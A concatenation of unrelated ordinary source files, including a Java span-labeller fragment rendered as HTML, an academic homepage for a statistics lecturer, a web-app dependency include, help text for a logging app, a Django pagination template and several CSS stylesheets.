<a class="jxr_linenumber" name="L517" href="#L517">517</a> <em class="jxr_comment">// THE SVM BELOW WAS ORIGINALLY USED</em>
<a class="jxr_linenumber" name="L518" href="#L518">518</a> <em class="jxr_comment">// final Classifier.Parameters parameters = Classifier.Parameters.forSVMRBFKernel(2,</em>
<a class="jxr_linenumber" name="L519" href="#L519">519</a> <em class="jxr_comment">// new float[] { 1f, 1f }, 1f, .1f);</em>
<a class="jxr_linenumber" name="L520" href="#L520">520</a> <em class="jxr_comment">// final Classifier classifier = Classifier.train(parameters, this.trainingSet);</em>
<a class="jxr_linenumber" name="L521" href="#L521">521</a>
<a class="jxr_linenumber" name="L522" href="#L522">522</a> <em class="jxr_comment">// Log parameters of the best classifier</em>
<a class="jxr_linenumber" name="L523" href="#L523">523</a> LOGGER.info(<span class="jxr_string">"Best classifier parameters: {}"</span>, classifier.getParameters());
<a class="jxr_linenumber" name="L524" href="#L524">524</a>
<a class="jxr_linenumber" name="L525" href="#L525">525</a> <em class="jxr_comment">// Perform cross-validation and emit some performance statistics, if enabled</em>
<a class="jxr_linenumber" name="L526" href="#L526">526</a> <strong class="jxr_keyword">if</strong> (analyze && LOGGER.isInfoEnabled()) {
<a class="jxr_linenumber" name="L527" href="#L527">527</a> <strong class="jxr_keyword">final</strong> List<LabelledVector> trainingPredictions = classifier.predict(false,
<a class="jxr_linenumber" name="L528" href="#L528">528</a> <strong class="jxr_keyword">this</strong>.trainingSet);
<a class="jxr_linenumber" name="L529" href="#L529">529</a> <strong class="jxr_keyword">final</strong> ConfusionMatrix matrix = LabelledVector.evaluate(<strong class="jxr_keyword">this</strong>.trainingSet,
<a class="jxr_linenumber" name="L530" href="#L530">530</a> trainingPredictions, 2);
<a class="jxr_linenumber" name="L531" href="#L531">531</a> LOGGER.info(<span class="jxr_string">"Performances on training set:\n{}"</span>, matrix);
<a class="jxr_linenumber" name="L532" href="#L532">532</a> <strong class="jxr_keyword">final</strong> ConfusionMatrix crossMatrix = Classifier.crossValidate(
<a class="jxr_linenumber" name="L533" href="#L533">533</a> classifier.getParameters(), <strong class="jxr_keyword">this</strong>.trainingSet, 5, -1);
<a class="jxr_linenumber" name="L534" href="#L534">534</a> LOGGER.info(<span class="jxr_string">"5-fold cross-validation performances:\n{}"</span>, crossMatrix);
<a class="jxr_linenumber" name="L535" href="#L535">535</a> }
<a class="jxr_linenumber" name="L536" href="#L536">536</a>
<a class="jxr_linenumber" name="L537" href="#L537">537</a> <em class="jxr_comment">// Build and return the created span labeller</em>
<a class="jxr_linenumber" name="L538" href="#L538">538</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">new</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a>(classifier);
<a class="jxr_linenumber" name="L539" href="#L539">539</a> }
<a class="jxr_linenumber" name="L540" href="#L540">540</a>
<a class="jxr_linenumber" name="L541" href="#L541">541</a> }
<a class="jxr_linenumber" name="L542" href="#L542">542</a>
<a class="jxr_linenumber" name="L543" href="#L543">543</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">interface</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a> {
<a class="jxr_linenumber" name="L544" href="#L544">544</a>
<a class="jxr_linenumber" name="L545" href="#L545">545</a> LabelledVector predict(<strong class="jxr_keyword">final</strong> Vector vector);
<a class="jxr_linenumber" name="L546" href="#L546">546</a>
<a class="jxr_linenumber" name="L547" href="#L547">547</a> }
<a class="jxr_linenumber" name="L548" href="#L548">548</a>
<a class="jxr_linenumber" name="L549" href="#L549">549</a> }
</pre>
<hr/>
<div id="footer">Copyright © 2016–2020 <a href="http://www.fbk.eu">FBK</a>. All rights reserved.</div>
</body>
</html>
|
index.html | acaimo/acaimo.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="generator" content="pandoc" />
<meta http-equiv="X-UA-Compatible" content="IE=EDGE" />
<title>Alberto Caimo</title>
<script src="site_libs/header-attrs-2.11/header-attrs.js"></script>
<script src="site_libs/jquery-3.6.0/jquery-3.6.0.min.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href="site_libs/bootstrap-3.3.5/css/spacelab.min.css" rel="stylesheet" />
<script src="site_libs/bootstrap-3.3.5/js/bootstrap.min.js"></script>
<script src="site_libs/bootstrap-3.3.5/shim/html5shiv.min.js"></script>
<script src="site_libs/bootstrap-3.3.5/shim/respond.min.js"></script>
<style>h1 {font-size: 34px;}
h1.title {font-size: 38px;}
h2 {font-size: 30px;}
h3 {font-size: 24px;}
h4 {font-size: 18px;}
h5 {font-size: 16px;}
h6 {font-size: 12px;}
code {color: inherit; background-color: rgba(0, 0, 0, 0.04);}
pre:not([class]) { background-color: white }</style>
<script src="site_libs/navigation-1.1/tabsets.js"></script>
<link href="site_libs/highlightjs-9.12.0/default.css" rel="stylesheet" />
<script src="site_libs/highlightjs-9.12.0/highlight.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-115609505-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-115609505-1');
</script>
<style type="text/css">
code{white-space: pre-wrap;}
span.smallcaps{font-variant: small-caps;}
span.underline{text-decoration: underline;}
div.column{display: inline-block; vertical-align: top; width: 50%;}
div.hanging-indent{margin-left: 1.5em; text-indent: -1.5em;}
ul.task-list{list-style: none;}
</style>
<style type="text/css">code{white-space: pre;}</style>
<script type="text/javascript">
if (window.hljs) {
hljs.configure({languages: []});
hljs.initHighlightingOnLoad();
if (document.readyState && document.readyState === "complete") {
window.setTimeout(function() { hljs.initHighlighting(); }, 0);
}
}
</script>
<link rel="stylesheet" href="mycss.css" type="text/css" />
<style type = "text/css">
.main-container {
max-width: 940px;
margin-left: auto;
margin-right: auto;
}
img {
max-width:100%;
}
.tabbed-pane {
padding-top: 12px;
}
.html-widget {
margin-bottom: 20px;
}
button.code-folding-btn:focus {
outline: none;
}
summary {
display: list-item;
}
pre code {
padding: 0;
}
</style>
<style type="text/css">
.dropdown-submenu {
position: relative;
}
.dropdown-submenu>.dropdown-menu {
top: 0;
left: 100%;
margin-top: -6px;
margin-left: -1px;
border-radius: 0 6px 6px 6px;
}
.dropdown-submenu:hover>.dropdown-menu {
display: block;
}
.dropdown-submenu>a:after {
display: block;
content: " ";
float: right;
width: 0;
height: 0;
border-color: transparent;
border-style: solid;
border-width: 5px 0 5px 5px;
border-left-color: #cccccc;
margin-top: 5px;
margin-right: -10px;
}
.dropdown-submenu:hover>a:after {
border-left-color: #adb5bd;
}
.dropdown-submenu.pull-left {
float: none;
}
.dropdown-submenu.pull-left>.dropdown-menu {
left: -100%;
margin-left: 10px;
border-radius: 6px 0 6px 6px;
}
</style>
<script type="text/javascript">
// manage active state of menu based on current page
$(document).ready(function () {
// active menu anchor
href = window.location.pathname
href = href.substr(href.lastIndexOf('/') + 1)
if (href === "")
href = "index.html";
var menuAnchor = $('a[href="' + href + '"]');
// mark it active
menuAnchor.tab('show');
// if it's got a parent navbar menu mark it active as well
menuAnchor.closest('li.dropdown').addClass('active');
// Navbar adjustments
var navHeight = $(".navbar").first().height() + 15;
var style = document.createElement('style');
var pt = "padding-top: " + navHeight + "px; ";
var mt = "margin-top: -" + navHeight + "px; ";
var css = "";
// offset scroll position for anchor links (for fixed navbar)
for (var i = 1; i <= 6; i++) {
css += ".section h" + i + "{ " + pt + mt + "}\n";
}
style.innerHTML = "body {" + pt + "padding-bottom: 40px; }\n" + css;
document.head.appendChild(style);
});
</script>
<!-- tabsets -->
<style type="text/css">
.tabset-dropdown > .nav-tabs {
display: inline-table;
max-height: 500px;
min-height: 44px;
overflow-y: auto;
border: 1px solid #ddd;
border-radius: 4px;
}
.tabset-dropdown > .nav-tabs > li.active:before {
content: "";
font-family: 'Glyphicons Halflings';
display: inline-block;
padding: 10px;
border-right: 1px solid #ddd;
}
.tabset-dropdown > .nav-tabs.nav-tabs-open > li.active:before {
content: "";
border: none;
}
.tabset-dropdown > .nav-tabs.nav-tabs-open:before {
content: "";
font-family: 'Glyphicons Halflings';
display: inline-block;
padding: 10px;
border-right: 1px solid #ddd;
}
.tabset-dropdown > .nav-tabs > li.active {
display: block;
}
.tabset-dropdown > .nav-tabs > li > a,
.tabset-dropdown > .nav-tabs > li > a:focus,
.tabset-dropdown > .nav-tabs > li > a:hover {
border: none;
display: inline-block;
border-radius: 4px;
background-color: transparent;
}
.tabset-dropdown > .nav-tabs.nav-tabs-open > li {
display: block;
float: none;
}
.tabset-dropdown > .nav-tabs > li {
display: none;
}
</style>
<!-- code folding -->
</head>
<body>
<div class="container-fluid main-container">
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.html">Alberto Caimo</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
</ul>
<ul class="nav navbar-nav navbar-right">
<li>
<a href="https://acaimo.github.io/index.html">Home</a>
</li>
<li>
<a href="about.html">About</a>
</li>
<li>
<a href="research.html">Research</a>
</li>
<li>
<a href="publications.html">Publications</a>
</li>
<li>
<a href="teaching.html">Teaching</a>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">
Software
<span class="caret"></span>
</a>
<ul class="dropdown-menu" role="menu">
<li>
<a href="https://acaimo.github.io/Bergm/">Bergm (R package)</a>
</li>
<li>
<a href="https://github.com/acaimo/Bergm-nodal-effects">Bergm-nodal-effects (R code)</a>
</li>
<li>
<a href="https://github.com/acaimo/ergm-terms">Some ergm terms (C code)</a>
</li>
</ul>
</li>
</ul>
</div><!--/.nav-collapse -->
</div><!--/.container -->
</div><!--/.navbar -->
<div id="header">
<h1 class="title toc-ignore">Alberto Caimo</h1>
</div>
<style type="text/css">
<!-- body{ -->
<!-- font-family: Palatino; -->
<!-- color: #707070; -->
<!-- } -->
.tabbed-pane {
border-style: solid;
border-top-style: none;
border-color: #fff;
border-width: 1px;
border-top-color: #e2e2e2;
padding: 10px;
}
.section h1 {
padding-top: 100px;
font-size: 29px;
}
.section h2 {
padding-top: 90px;
font-size: 23px;
}
.section h3 {
padding-top: 80px;
font-size: 19px;
}
.section h4 {
padding-top: 90px;
}
.title{
display: none;
}
/* visited link */
a:visited {
text-decoration: none;
}
/* mouse over link */
a:hover {
text-decoration: none;
}
/* selected link */
a:active {
text-decoration: none;
}
@media all and (max-width:500px){
table{
width:100%;
}
td{
display:block;
width:100%;
}
tr{
display:block;
margin-bottom:30px;
}
}
</style>
<p><br/></p>
<table border="0" cellpadding="5px" style="text-align:left;font-weight:normal">
<tbody>
<tr>
<td style="text-align:center;width:80px">
<br/>
</td>
<td style="text-align:center">
<img src="alb_3.jpg" width="290" style='border-radius:10px;padding:3px;border:1px solid #dcdcdc;background-color:#f9f9f9'>
</td>
<td style="text-align:center;padding:25px">
<h2>
Alberto Caimo
</h2>
<h5>
Lecturer in Statistics
</h5>
<h5>
School of Mathematical Sciences
</h5>
<h5>
Technological University Dublin
</h5>
<a href="https://www.tudublin.ie/explore/schools-and-disciplines/data-analytics-mathematics/mathematical-sciences/people/albertocaimo.html" target="_blank" rel="noopener"> <i class="fas fa-university fa-lg"></i> </a> <a href="mailto:alberto.caimo@tudublin.ie" target="_blank" rel="noopener"> <i class="fa fa-envelope fa-lg"></i> </a> <a href="//twitter.com/albertocaimo" target="_blank" rel="noopener"> <i class="fab fa-twitter fa-lg"></i> </a> <a href="https://scholar.google.com/citations?user=tZKARSgAAAAJ&hl=en" target="_blank" rel="noopener"> <i class="fa fa-graduation-cap fa-lg"></i> </a> <a href="https://github.com/acaimo" target="_blank" rel="noopener"> <i class="fab fa-github fa-lg"></i> </a>
</td>
</tr>
</tbody>
</table>
<p><br/> <br/><br/> <a class="twitter-timeline"
href="https://twitter.com/albertocaimo"
data-width="350"
data-height="350"> </a> <a class="twitter-timeline"
href="https://twitter.com/BayesianSNA"
data-width="350"
data-height="350"> </a></p>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<script defer src="https://use.fontawesome.com/releases/v5.0.9/js/all.js" integrity="sha384-8iPTk2s/jMVj81dnzb/iFR2sdA7u06vHJyyLlAd4snFpCl/SnyUjRrbdJsw1pGIl" crossorigin="anonymous"></script>
</div>
<script>
// add bootstrap table styles to pandoc tables
function bootstrapStylePandocTables() {
$('tr.odd').parent('tbody').parent('table').addClass('table table-condensed');
}
$(document).ready(function () {
bootstrapStylePandocTables();
});
</script>
<!-- tabsets -->
<script>
$(document).ready(function () {
window.buildTabsets("TOC");
});
$(document).ready(function () {
$('.tabset-dropdown > .nav-tabs > li').click(function () {
$(this).parent().toggleClass('nav-tabs-open');
});
});
</script>
<!-- code folding -->
<!-- dynamically load mathjax for compatibility with self-contained -->
<script>
(function () {
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML";
document.getElementsByTagName("head")[0].appendChild(script);
})();
</script>
</body>
</html>
|
assets/recline/_includes/recline-deps.html | citizen-cyberscience-centre/t4t-stats | <link rel="stylesheet" href="{{page.root}}vendor/leaflet/0.3.1/leaflet.css">
<!--[if lte IE 8]>
<link rel="stylesheet" href="{{page.root}}vendor/leaflet/0.3.1/leaflet.ie.css" />
<![endif]-->
<link rel="stylesheet" href="{{page.root}}vendor/slickgrid/2.0.1/slick.grid.css">
<!-- Recline CSS components -->
<link rel="stylesheet" href="{{page.root}}css/grid.css">
<link rel="stylesheet" href="{{page.root}}css/slickgrid.css">
<link rel="stylesheet" href="{{page.root}}css/graph.css">
<link rel="stylesheet" href="{{page.root}}css/transform.css">
<link rel="stylesheet" href="{{page.root}}css/map.css">
<link rel="stylesheet" href="{{page.root}}css/multiview.css">
<!-- /Recline CSS components -->
<!-- 3rd party JS libraries -->
<script type="text/javascript" src="{{page.root}}vendor/jquery/1.7.1/jquery.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/underscore/1.1.6/underscore.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/backbone/0.5.1/backbone.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/mustache/0.5.0-dev/mustache.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/bootstrap/2.0.2/bootstrap.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/flotr2/flotr2.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/leaflet/0.3.1/leaflet.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/slickgrid/2.0.1/jquery-ui-1.8.16.custom.min.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/slickgrid/2.0.1/jquery.event.drag-2.0.min.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/slickgrid/2.0.1/slick.grid.min.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/moment/1.6.2/moment.js"></script>
<script type="text/javascript" src="{{page.root}}vendor/timeline/20120520/js/timeline.js"></script>
<!--
## Just use the all in one library version rather than individual files
<script type="text/javascript" src="{{page.root}}dist/recline.js"></script>
-->
<!-- model and backends -->
<script type="text/javascript" src="{{page.root}}src/model.js"></script>
<script type="text/javascript" src="{{page.root}}src/backend.memory.js"></script>
<script type="text/javascript" src="{{page.root}}src/backend.dataproxy.js"></script>
<script type="text/javascript" src="{{page.root}}src/backend.gdocs.js"></script>
<script type="text/javascript" src="{{page.root}}src/backend.elasticsearch.js"></script>
<script type="text/javascript" src="{{page.root}}src/backend.csv.js"></script>
<!-- views -->
<script type="text/javascript" src="{{page.root}}src/view.grid.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.slickgrid.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.transform.js"></script>
<script type="text/javascript" src="{{page.root}}src/data.transform.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.graph.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.map.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.timeline.js"></script>
<script type="text/javascript" src="{{page.root}}src/widget.pager.js"></script>
<script type="text/javascript" src="{{page.root}}src/widget.queryeditor.js"></script>
<script type="text/javascript" src="{{page.root}}src/widget.filtereditor.js"></script>
<script type="text/javascript" src="{{page.root}}src/widget.fields.js"></script>
<script type="text/javascript" src="{{page.root}}src/view.multiview.js"></script>
|
assets/dialogs/te_help_create.html | sosiouxme/LogMyLife | <!--
This file is part of LogMyLife, an application for logging events.
Copyright (C) 2011 Luke Meyer
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program (see LICENSE file).
If not, see http://www.gnu.org/licenses/
-->
<html><body>
<p>
This screen is for creating a tracker to name what you are logging (e.g. getting a
haircut, exercising, calling Mom). Trackers can
be for events that occur, tasks you perform, or anything recurring in general that you
want to keep track of.
</p>
<ul><li>
<b>Group: </b> You can choose a different group for the tracker by changing this.
Also, when you return to the main screen, this is the tracker group you'll see.
</li><li>
<b>Name: </b> This is what shows up in the list of trackers on the main screen.
Make it a good summary of what you're tracking.
</li><li>
<b>Notes: </b> Optional further description of what it is you're keeping track of.
</li><li>
<b>Value: </b> Optional label for the option value you can record with log entries
for later use in graphs and summaries.
</li><li>
<b>Reminders: </b> You can optionally have LogMyLife remind you when an interval of time
has passed since the last log entry. This can be helpful to remind you to do something
or take note of a gap between occurrences. You can configure multiple reminders with different
intervals.
</li></ul>
<p>
A tracker only needs a name in order to be created (the "Save" button
is inactive until you specify one).
</p><p>
If you press the back button, the tracker is saved just as if you had pressed "Save".
You must use the "Cancel" button to cancel creation.</p>
</body>
</html>
|
style_sugarcube.css | th0ma5w/Twine_Fullscreen_YouTube | #passages {
/* This only affects passages */
padding: 10px;
background: rgba(0,0,0,0.75);
}
#ui-bar {
background: rgba(20,20,20,0.9);
}
#fsyoutube {
position:absolute;top:0px;left:0px;z-index:-100;
}
|
sms/templates/pagination.html | fmalina/texting | {% if is_paginated %}
<div class="paging">
<div>
{% if page_obj.has_previous %}<a rel="prev" href="{{ path }}?page={{ page_obj.previous_page_number }}{{ getvars }}">‹ previous</a>{% endif %}
{% if mobile %}
<i> {{ page_obj.number }} of {{ pages|length }} </i>
{% else %}
{% for page in pages %}
{% if page %}
{% if page == page_obj.number %}
<span class="active{% if forloop.last %} last{% endif %}">{{ page }}</span>
{% else %}
<a{% if forloop.last %} class="last"{% endif %} href="{{ path }}?page={{ page }}{{ getvars }}">{{ page }}</a>
{% endif %}
{% else %}
<span>…</span>
{% endif %}
{% endfor %}
{% endif %}
{% if page_obj.has_next %}<a rel="next" class="next" href="{{ path }}?page={{ page_obj.next_page_number }}{{ getvars }}">next ›</a>{% endif %}
</div>
</div>
{% endif %}
|
qpthemes/clean/menu.css | onyxnz/quartzpos | /*
Todd Motto Labs
URL: www.toddmotto.com
*/
/*------------------------------------*\
RESET
\*------------------------------------*/
*,
*:after,
*:before {
margin:0;
padding:0;
box-sizing:border-box;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
-webkit-font-smoothing:antialiased;
font-smoothing:antialiased;
text-rendering:optimizeLegibility;
}
/*------------------------------------*\
STRUCTURE
\*------------------------------------*/
#menucontainer{
position:absolute;
top:0px;
left:300px;
}
#menu1,#menu2{
padding: 0px !important;
text-align: center !important;
border: solid 1px #222 !important;
cursor: pointer !important;
color: hsla(0,0%,20%,1) !important;
text-shadow: hsla(0,0%,40%,.5) 0 -1px 0, hsla(0,0%,100%,.6) 0 2px 1px !important;
/*background-color: hsl(0,0%,90%) !important;*/
box-shadow: inset hsla(0,0%,15%, 1) 0 0px 0px 1px, /* border */ inset hsla(0,0%,15%, .8) 0 -1px 5px 1px, /* soft SD */ inset hsla(0,0%,0%, .25) 0 -1px 0px 3px, /* bottom SD */ inset hsla(0,0%,100%,.7) 0 2px 1px 3px, /* top HL */ hsla(0,0%, 0%,.15) 0 -5px 6px 1px, /* outer SD */ hsla(0,0%,100%,.5) 0 5px 6px 1px !important;
transition: color .3s !important;
border-radius: .3em !important;
background: #08f;
}
.wrapper {
max-width:1280px;
margin:0 auto;
}
.header {
padding:15px 25px;
background:#FFF;
border-left:5px solid #2BA6CB;
overflow:hidden;
}
.logo {
float:left;
}
.nav {
float:right;
margin:12px 0;
list-style:none;
}
.nav-link {
}
.nav-link a {
color:#2BA6CB;
text-decoration:none;
}
/*
Todd Motto Labs
URL: www.toddmotto.com
*/
/*------------------------------------*\
Clickable Dropdown
\*------------------------------------*/
.click-nav {
/*margin:100px auto;
width:200px;*/
}
.click-nav ul {
font-weight:900;
}
.click-nav ul li {
position:relative;
list-style:none;
cursor:pointer;
min-width:200px;
display:inline-block;
}
.clicker{width:200px;}
.click-nav ul li ul {
position:absolute;
left:0;
right:0;
display:none;
}
.click-nav ul .clicker {
padding:.4em;
border: solid 1px #222;
cursor: pointer;
color: hsla(0,0%,20%,1);
text-shadow: hsla(0,0%,40%,.5) 0 -1px 0, hsla(0,0%,100%,.6) 0 2px 1px;
background-color: hsl(0,0%,90%);
box-shadow: inset hsla(0,0%,15%, 1) 0 0px 0px 1px, /* border */ inset hsla(0,0%,15%, .8) 0 -1px 5px 1px, /* soft SD */ inset hsla(0,0%,0%, .25) 0 -1px 0px 3px, /* bottom SD */ inset hsla(0,0%,100%,.7) 0 2px 1px 3px, /* top HL */ hsla(0,0%, 0%,.15) 0 -5px 6px 1px, /* outer SD */ hsla(0,0%,100%,.5) 0 5px 6px 1px;
transition: color .3s;
border-radius: .3em;
background: #08f;
}
.click-nav img {
position:absolute;
top:9px;
left:12px;
}
.click-nav ul li a {
transition:background-color 0.2s ease-in-out;
-webkit-transition:background-color 0.2s ease-in-out;
-moz-transition:background-color 0.2s ease-in-out;
display:inline-block;
padding:8px 10px 8px 10px;
color:#333;
text-decoration:none;
}
.hotkeylabel{font-size:.6em;color:#003f81;display:inline-block;}
/* Fallbacks */
.click-nav .js ul {
display:none;
}
.click-nav a.clicker:hover ::parent ul{
display:block;
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.